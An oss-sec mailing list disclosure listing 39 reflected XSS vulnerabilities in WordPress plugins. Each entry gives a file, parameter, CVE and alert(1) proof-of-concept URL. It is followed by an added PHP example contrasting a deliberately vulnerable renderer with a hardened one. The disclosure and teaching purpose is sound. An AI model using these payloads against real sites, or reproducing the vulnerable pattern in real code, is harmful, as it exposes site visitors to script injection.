oss-sec mailing list archives

39 XSS vulnerabilities in 35 wordpress plugins.


From: "Larry W. Cashdollar" <larry0 () me com>
Date: Tue, 12 Apr 2016 08:48:01 -0400

Hello List,


This was a project I worked on as part of my research in Akamai's SIRT. I initially found 1352 suspect XSS
vulnerabilities, but WordPress escapes the super globals GET/POST/REQUEST
(https://core.trac.wordpress.org/ticket/18322). I didn't know this at the time, so now I have a database of
vulnerabilities that are context dependent and would need to be examined
individually. I managed to automate XSS testing against the database, and of the 1352, 39 successfully executed JavaScript.
These are those 39; I've manually verified they're still vulnerable.

They're available here: http://www.vapidlabs.com/wp/wp.php

I notified WordPress back in February of my research.


Plugin: https://wordpress.org/plugins/mousewheel-smooth-scroll
File: ./mousewheel-smooth-scroll/js/wpmss.php
Parameter: ease speed step
CVE-2016-77447
PoC: hxxp://[target]/wp-content/plugins/mousewheel-smooth-scroll/js/wpmss.php?step="><script>alert(1);</script><"

Plugin: https://wordpress.org/plugins/indexisto
File: ./indexisto/assets/js/indexisto-inject.php
Parameter: indexisto_index
CVE-2016-77360
PoC: hxxp://[target]/wp-content/plugins/indexisto/assets/js/indexisto-inject.php?indexisto_index="><script>alert(1);</script><"

Plugin: https://wordpress.org/plugins/prettypre
File: ./prettypre/prettyprecss.php
Parameter: ts
CVE-2016-77548
PoC: hxxp://[target]/wp-content/plugins/prettypre/prettyprecss.php?ts="><script>alert(1);</script><"

Plugin: https://wordpress.org/plugins/whizz
File: ./whizz/plugins/delete-plugin.php
Parameter: plugin
CVE-2016-77799
PoC: hxxp://[target]/wp-content/plugins/whizz/plugins/delete-plugin.php?plugin="><script>alert(1);</script><"

Plugin: https://wordpress.org/plugins/mypuzzle-jigsaw
File: ./mypuzzle-jigsaw/getGallery.php
Parameter: callback
CVE-2016-77465
PoC: hxxp://[target]/wp-content/plugins/mypuzzle-jigsaw/getGallery.php?callback="><script>alert(1);</script><"

Plugin: https://wordpress.org/plugins/anti-plagiarism
File: ./anti-plagiarism/js.php
Parameter: m
CVE-2016-77035
PoC: hxxp://[target]/wp-content/plugins/anti-plagiarism/js.php?m="><script>alert(1);</script><"

Plugin: https://wordpress.org/plugins/qoate-scroll-triggered-box
File: ./qoate-scroll-triggered-box/assets/js/script.php
Parameter: anim perc sac vpos
CVE-2016-77559
PoC: hxxp://[target]/wp-content/plugins/qoate-scroll-triggered-box/assets/js/script.php?anim="><script>alert(1);</script><"

Plugin: https://wordpress.org/plugins/s3-video
File: ./s3-video/views/video-management/preview_video.php
Parameter: media
CVE-2016-77600
PoC: hxxp://[target]/wp-content/plugins/s3-video/views/video-management/preview_video.php?media="><script>alert(1);</script><"

Plugin: https://wordpress.org/plugins/wpsolr-search-engine
File: ./wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php
Parameter: page tab
CVE-2016-77958
PoC: hxxp://[target]/wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php?page="><script>alert(1);</script><"

Plugin: https://wordpress.org/plugins/page-layout-builder
File: ./page-layout-builder/includes/layout-settings.php
Parameter: layout_settings_id
CVE-2016-77503
PoC: hxxp://[target]/wp-content/plugins/page-layout-builder/includes/layout-settings.php?layout_settings_id="><script>alert(1);</script><"

Plugin: https://wordpress.org/plugins/mypuzzle-sliding
File: ./mypuzzle-sliding/getGallery.php
Parameter: callback
CVE-2016-77466
PoC: hxxp://[target]/wp-content/plugins/mypuzzle-sliding/getGallery.php?callback="><script>alert(1);</script><"

Plugin: https://wordpress.org/plugins/e-search
File: ./e-search/tmpl/date_select.php
Parameter: date-from date-to
CVE-2016-77217
PoC: hxxp://[target]/wp-content/plugins/e-search/tmpl/date_select.php?date-from="><script>alert(1);</script><"

Plugin: https://wordpress.org/plugins/e-search
File: ./e-search/tmpl/title_az.php
Parameter: title_az
CVE-2016-77217
PoC: hxxp://[target]/wp-content/plugins/e-search/tmpl/title_az.php?title_az="><script>alert(1);</script><"

Plugin: https://wordpress.org/plugins/tidio-gallery
File: ./tidio-gallery/popup-insert-help.php
Parameter: galleryId id tidio-gallery
CVE-2016-77727
PoC: hxxp://[target]/wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId="><script>alert(1);</script><"

Plugin: https://wordpress.org/plugins/parsi-font
File: ./parsi-font/css.php
Parameter: font size
CVE-2016-77506
PoC: hxxp://[target]/wp-content/plugins/parsi-font/css.php?size="><script>alert(1);</script><"

Plugin: https://wordpress.org/plugins/defa-online-image-protector
File: ./defa-online-image-protector/redirect.php
Parameter: r
CVE-2016-77193
PoC: hxxp://[target]/wp-content/plugins/defa-online-image-protector/redirect.php?r="><script>alert(1);</script><"

Plugin: https://wordpress.org/plugins/new-year-firework
File: ./new-year-firework/firework/index.php
Parameter: music text url
CVE-2016-77475
PoC: hxxp://[target]/wp-content/plugins/new-year-firework/firework/index.php?text="><script>alert(1);</script><"

Plugin: https://wordpress.org/plugins/simpel-reserveren
File: ./simpel-reserveren/edit.php
Parameter: page
CVE-2016-77628
PoC: hxxp://[target]/wp-content/plugins/simpel-reserveren/edit.php?page="><script>alert(1);</script><"

Plugin: https://wordpress.org/plugins/groupon-widget
File: ./groupon-widget/widget.css.php
Parameter: grpn_wdgt_get_it_btn_background grpn_wdgt_link_color grpn_wdgt_price_tag_background grpn_wdgt_shell_background grpn_wdgt_text_color grpn_wdgt_title_color
CVE-2016-77332
PoC: hxxp://[target]/wp-content/plugins/groupon-widget/widget.css.php?grpn_wdgt_shell_background="><script>alert(1);</script><"

Plugin: https://wordpress.org/plugins/wp-notifications
File: ./wp-notifications/css/ln_livenotifications_css.php
Parameter: banner_bgcolor dropdown_bit_bgcolor dropdown_bit_color dropdown_boder_color dropdown_color dropdown_hover_bgcolor dropdown_link_color
CVE-2016-77885
PoC: hxxp://[target]/wp-content/plugins/wp-notifications/css/ln_livenotifications_css.php?dropdown_color="><script>alert(1);</script><"

Plugin: https://wordpress.org/plugins/wp-latest-posts
File: ./wp-latest-posts/js/wpcufpn_front.js.php
Parameter: id
CVE-2016-77873
PoC: hxxp://[target]/wp-content/plugins/wp-latest-posts/js/wpcufpn_front.js.php?id="><script>alert(1);</script><"

Plugin: https://wordpress.org/plugins/ajax-random-post
File: ./ajax-random-post/js.php
Parameter: count interval
CVE-2016-77022
PoC: hxxp://[target]/wp-content/plugins/ajax-random-post/js.php?interval="><script>alert(1);</script><"

Plugin: https://wordpress.org/plugins/admin-font-editor
File: ./admin-font-editor/css.php
Parameter: font size
CVE-2016-77009
PoC: hxxp://[target]/wp-content/plugins/admin-font-editor/css.php?size="><script>alert(1);</script><"

Plugin: https://wordpress.org/plugins/hdw-tube
File: ./hdw-tube/playlist.php
Parameter: playlist
CVE-2016-77337
PoC: hxxp://[target]/wp-content/plugins/hdw-tube/playlist.php?playlist="><script>alert(1);</script><"

Plugin: https://wordpress.org/plugins/hdw-tube
File: ./hdw-tube/mychannel.php
Parameter: channel
CVE-2016-77337
PoC: hxxp://[target]/wp-content/plugins/hdw-tube/mychannel.php?channel="><script>alert(1);</script><"

Plugin: https://wordpress.org/plugins/lbak-google-checkout
File: ./lbak-google-checkout/css/googlecheckout.php
Parameter: ih iw ph pw tc
CVE-2016-77395
PoC: hxxp://[target]/wp-content/plugins/lbak-google-checkout/css/googlecheckout.php?pw="><script>alert(1);</script><"

Plugin: https://wordpress.org/plugins/razuna-media-manager
File: ./razuna-media-manager/pages/ajax/razuna-upload-callback.php
Parameter: message responsecode
CVE-2016-77577
PoC: hxxp://[target]/wp-content/plugins/razuna-media-manager/pages/ajax/razuna-upload-callback.php?responsecode="><script>alert(1);</script><"

Plugin: https://wordpress.org/plugins/mypuzzle-find-the-pair-a-memory-game
File: ./mypuzzle-find-the-pair-a-memory-game/ftpair-getCardImages.php
Parameter: callback
CVE-2016-77464
PoC: hxxp://[target]/wp-content/plugins/mypuzzle-find-the-pair-a-memory-game/ftpair-getCardImages.php?callback="><script>alert(1);</script><"

Plugin: https://wordpress.org/plugins/surveymonkey-button
File: ./surveymonkey-button/start_survey.php
Parameter: jqueryPepPath
CVE-2016-77702
PoC: hxxp://[target]/wp-content/plugins/surveymonkey-button/start_survey.php?jqueryPepPath="><script>alert(1);</script><"

Plugin: https://wordpress.org/plugins/hero-maps-pro
File: ./hero-maps-pro/views/dashboard/index.php
Parameter: p v
CVE-2016-77341
PoC: hxxp://[target]/wp-content/plugins/hero-maps-pro/views/dashboard/index.php?v="><script>alert(1);</script><"

Plugin: https://wordpress.org/plugins/bbpress-social-network
File: ./bbpress-social-network/css/ln_livenotifications_css.php
Parameter: banner_bgcolor dropdown_bit_bgcolor dropdown_bit_color dropdown_boder_color dropdown_color dropdown_hover_bgcolor dropdown_link_color
CVE-2016-77074
PoC: hxxp://[target]/wp-content/plugins/bbpress-social-network/css/ln_livenotifications_css.php?dropdown_color="><script>alert(1);</script><"

Plugin: https://wordpress.org/plugins/bbpress-social-network
File: ./bbpress-social-network/css/ln_livenotifications_cssback.php
Parameter: banner_bgcolor dropdown_bgcolor dropdown_bit_bgcolor dropdown_bit_color dropdown_boder_color dropdown_color dropdown_hover_bgcolor dropdown_link_color
CVE-2016-77074
PoC: hxxp://[target]/wp-content/plugins/bbpress-social-network/css/ln_livenotifications_cssback.php?dropdown_bgcolor="><script>alert(1);</script><"

Plugin: https://wordpress.org/plugins/photoxhibit
File: ./photoxhibit/common/inc/pages/edit_styles.php
Parameter: gid
CVE-2016-77517
PoC: hxxp://[target]/wp-content/plugins/photoxhibit/common/inc/pages/edit_styles.php?gid="><script>alert(1);</script><"

Plugin: https://wordpress.org/plugins/photoxhibit
File: ./photoxhibit/common/inc/pages/build.php
Parameter: gid
CVE-2016-77517
PoC: hxxp://[target]/wp-content/plugins/photoxhibit/common/inc/pages/build.php?gid="><script>alert(1);</script><"

Plugin: https://wordpress.org/plugins/pondol-formmail
File: ./pondol-formmail/pages/admin-mail-info.php
Parameter: itemid
CVE-2016-77532
PoC: hxxp://[target]/wp-content/plugins/pondol-formmail/pages/admin-mail-info.php?itemid="><script>alert(1);</script><"

Plugin: https://wordpress.org/plugins/heat-trackr
File: ./heat-trackr/heat-trackr_abtest_add.php
Parameter: id N WPSLT
CVE-2016-77339
PoC: hxxp://[target]/wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php?id="><script>alert(1);</script><"

Plugin: https://wordpress.org/plugins/tidio-form
File: ./tidio-form/popup-insert-help.php
Parameter: formId id tidio-form
CVE-2016-77726
PoC: hxxp://[target]/wp-content/plugins/tidio-form/popup-insert-help.php?formId="><script>alert(1);</script><"

Plugin: https://wordpress.org/plugins/simplified-content
File: ./simplified-content/ooawpframework/js/ajax/OOAAjax.js.php
Parameter: ajaxURL
CVE-2016-77642
PoC: hxxp://[target]/wp-content/plugins/simplified-content/ooawpframework/js/ajax/OOAAjax.js.php?ajaxURL="><script>alert(1);</script><"

Plugin: https://wordpress.org/plugins/infusionsoft
File: ./infusionsoft/Infusionsoft/examples/leadscoring.php
Parameter: ContactId
CVE-2016-77364
PoC: hxxp://[target]/wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php?ContactId="><script>alert(1);</script><"

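The pattern behind most of the entries above (a standalone css.php or js.php under wp-content/plugins that builds its output from request parameters) is worth seeing next to its fix, and so is the "context dependent" point in the post: the slash-escaping WordPress applies to the super globals is done by wp_magic_quotes() in wp-settings.php, so it only happens when the file bootstraps WordPress, and even when it does, a backslash in front of a quote means nothing to an HTML parser. The following is an added example, not code from the post or from any of the plugins listed; the file layout, the function names and the parameters `font` and `size` (borrowed from the parsi-font and admin-font-editor entries) are assumptions, and the attribute context the values land in is constructed for illustration.

```php
<?php
// Added example (not from the post or any listed plugin): a standalone
// plugin file that turns two request parameters into an inline style
// attribute, shown vulnerable, with WordPress-style slash-escaping, and
// hardened. Parameter names and output context are constructed.

// Vulnerable form: raw parameters interpolated into a double-quoted
// attribute. A value starting with "> closes the attribute and the tag,
// and whatever follows is parsed as markup.
function render_vulnerable(array $params): string
{
    $font = $params['font'] ?? 'sans-serif';
    $size = $params['size'] ?? '14px';
    return '<body style="font-family: ' . $font . '; font-size: ' . $size . '">';
}

// Same output, but after the treatment wp_magic_quotes() would give the
// super globals if this file had loaded WordPress: addslashes() on every
// value. The quote is now \" but HTML does not treat the backslash as an
// escape, so the attribute is still broken out of. If the file is fetched
// directly as a stylesheet, even this does not run.
function render_slashed(array $params): string
{
    return render_vulnerable(array_map('addslashes', $params));
}

// Hardened form: validate each value against the shape a legitimate value
// has, then escape for the context it is written into (an HTML attribute).
// htmlspecialchars() here is the plain-PHP equivalent of WordPress's
// esc_attr(); the allowlist is defence in depth on top of the escaping.
function render_hardened(array $params): string
{
    $font = $params['font'] ?? 'sans-serif';
    $size = $params['size'] ?? '14px';
    if (!preg_match('/^[A-Za-z0-9 ,\'-]{1,64}$/', $font)) {
        $font = 'sans-serif';
    }
    if (!preg_match('/^\d{1,3}(px|pt|em|%)$/', $size)) {
        $size = '14px';
    }
    $style = 'font-family: ' . $font . '; font-size: ' . $size;
    return '<body style="' . htmlspecialchars($style, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '">';
}

// Crude check used only to show the difference: does the rendered output
// contain a live <script> element, i.e. did the payload escape the attribute?
function has_live_script(string $html): bool
{
    return stripos($html, '<script') !== false;
}

// Constructed sample input: the payload shape used by every PoC in the post.
$payload = ['size' => '"><script>alert(1);</script><"'];

foreach (['vulnerable' => render_vulnerable($payload),
          'addslashes' => render_slashed($payload),
          'hardened'   => render_hardened($payload)] as $label => $html) {
    printf("%-10s live script: %-3s %s\n", $label, has_live_script($html) ? 'yes' : 'no', $html);
}
```

Run with `php` on the command line: the first two rows print `yes` (the addslashes row shows the `\"` that still closes the attribute), the hardened row prints `no` with `size` replaced by the default. The same check applies to any of the files listed: if the value reaches a CSS, JavaScript or HTML context with only addslashes() between it and the output, the slashes are not a mitigation for that context.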